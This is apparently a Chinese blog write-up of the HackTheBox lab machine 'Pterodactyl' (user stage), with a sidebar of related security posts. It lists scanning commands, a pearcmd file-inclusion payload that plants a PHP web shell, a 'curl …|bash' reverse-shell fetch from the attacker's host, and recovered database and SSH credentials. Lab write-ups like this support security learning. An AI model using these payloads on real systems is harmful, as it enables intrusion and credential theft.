HTB 赛季10 - Pterodactyl - user

瘾大侠2026-02-13 9:58
复制代码 
10.129.16.212

nmap扫描

复制代码 
sudo nmap --top-ports 10000 10.129.16.212 --min-rate=1000 -oA ips_quick_TCP_nmapscan && sudo nmap --top-ports 10000 10.129.16.212 --min-rate=1000 -sU -oA ips_quick_UDP_nmapscan && nmap -p- 10.129.16.212 -oA ips_full_TCP_nmapscan --min-rate=1000 && sudo nmap -p- 10.129.16.212 -sU -oA ips_full_UDP_nmapscan --min-rate=1000

![[Pasted image 20260208171012.png]]

http://pterodactyl.htb/changelog.txt

![[Pasted image 20260208171809.png]]

我们注意到其背后有一个存在RCE的Panel中间件。我们对Web应用进行枚举

复制代码 
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt:FUZZ -u http://pterodactyl.htb/FUZZ -e .php -mc all

ffuf -w /home/kali/Desktop/Info/SecLists-master/SecLists-master/Discovery/DNS/subdomains-top1million-110000.txt:FUZZ -u http://pterodactyl.htb/ -H 'Host: FUZZ.pterodactyl.htb' -mc all -fw 18

![[Pasted image 20260208172226.png]]

![[Pasted image 20260208172440.png]]

我们了解到这个漏洞存在,经过大量尝试,我们发现该漏洞是一种php文件包含的变种,他包含了pearcmd后,导致了RCE。我的payload如下

复制代码 
/locales/locale.json?locale=../../../../../../../../../../usr/share/php/PEAR/&namespace=pearcmd&+config-create+/'<?=phpinfo()?>'+/tmp/info.php

![[Pasted image 20260208183251.png]]

复制代码 
/locales/locale.json?locale=..%2F..%2F..%2F..%2F..%2Ftmp&namespace=info

![[Pasted image 20260208183309.png]]

我们开始反连

复制代码 
/locales/locale.json?locale=../../../../../../../../../../usr/share/php/PEAR/&namespace=pearcmd&+config-create+/'<?=system($_GET["cmd"])?>'+/tmp/shell.php

![[Pasted image 20260208183354.png]]

复制代码 
/locales/locale.json?locale=..%2F..%2F..%2F..%2F..%2Ftmp&namespace=shell&cmd=curl+http://10.10.14.14/pwn|bash

![[Pasted image 20260208183543.png]]

![[Pasted image 20260208183627.png]]

上linpeas

复制代码 
wget http://10.10.14.14:81/linpeas.sh && chmod 755 linpeas.sh && ./linpeas.sh

![[Pasted image 20260208184031.png]]

喷洒密码,没有用

复制代码 
PteraPanel

wget http://10.10.14.14:81/pspy64 && chmod 755 pspy64 && ./pspy64

pterodactyl
PteraPanel

mysql -h127.0.0.1 -upterodactyl -pPteraPanel -e 'Show databases;use panel;show tables;Select * from users;Select username,password from users;'

![[Pasted image 20260208190605.png]]

![[Pasted image 20260208191849.png]]

复制代码 
ssh phileasfogg3@10.129.16.212 
!QAZ2wsx

![[Pasted image 20260208191631.png]]

我到这里发现了一封邮件并确认时使用udisk2的相关漏洞,但是我始终没能根据描述完成攻击。

相关推荐
用户962377954482 天前
DVWA 靶场实验报告 (High Level)
安全
数据智能老司机3 天前
用于进攻性网络安全的智能体 AI——在 n8n 中构建你的第一个 AI 工作流
人工智能·安全·agent
数据智能老司机3 天前
用于进攻性网络安全的智能体 AI——智能体 AI 入门
人工智能·安全·agent
用户962377954483 天前
DVWA 靶场实验报告 (Medium Level)
安全
red1giant_star3 天前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞
安全
用户962377954483 天前
DVWA Weak Session IDs High 的 Cookie dvwaSession 为什么刷新不出来?
安全
cipher4 天前
ERC-4626 通胀攻击:DeFi 金库的"捐款陷阱"
前端·后端·安全
一次旅行7 天前
网络安全总结
安全·web安全
DianSan_ERP7 天前
电商API接口全链路监控:构建坚不可摧的线上运维防线
大数据·运维·网络·人工智能·git·servlet
red1giant_star7 天前
手把手教你用Vulhub复现ecshop collection_list-sqli漏洞(附完整POC)
安全
热门推荐
01GitHub 镜像站点02OpenClaw 使用和管理 MCP 完全指南03OpenClaw + 飞书(Feishu)环境搭建指南04OpenClaw优化飞书API 额度已耗尽问题05本地部署 OpenClaw + DeepSeek-R1 完全指南06Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services07小黑课堂计算机二级WPSoffice题库软件下载安装教程(2026年3月最新版)08Window 10部署openclaw报错node.exe : npm error code 12809让 Trae IDE 智能体 “读懂”文档 Excel+PDF+DOCX :mcp-documents-reader 工具使用指南10网站改了域名,如何查找?